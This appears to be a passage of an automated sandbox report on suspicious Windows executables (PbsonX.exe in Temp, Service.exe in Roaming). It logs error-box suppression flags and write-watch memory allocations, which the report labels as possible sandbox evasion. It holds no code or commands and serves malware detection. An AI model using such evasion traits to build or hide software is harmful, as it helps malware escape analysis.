Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2720000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 1070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 26D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 23F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2F50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 16F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 3310000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 23F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 43F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 1010000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2AF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2E90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 3040000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 5040000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3280000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 5280000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 920000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 24B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 22A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 33C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3110000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2A30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4A30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 30E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 1020000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 4B50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 21E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 23B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 43B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: 13D0000 memory reserve | memory write watch
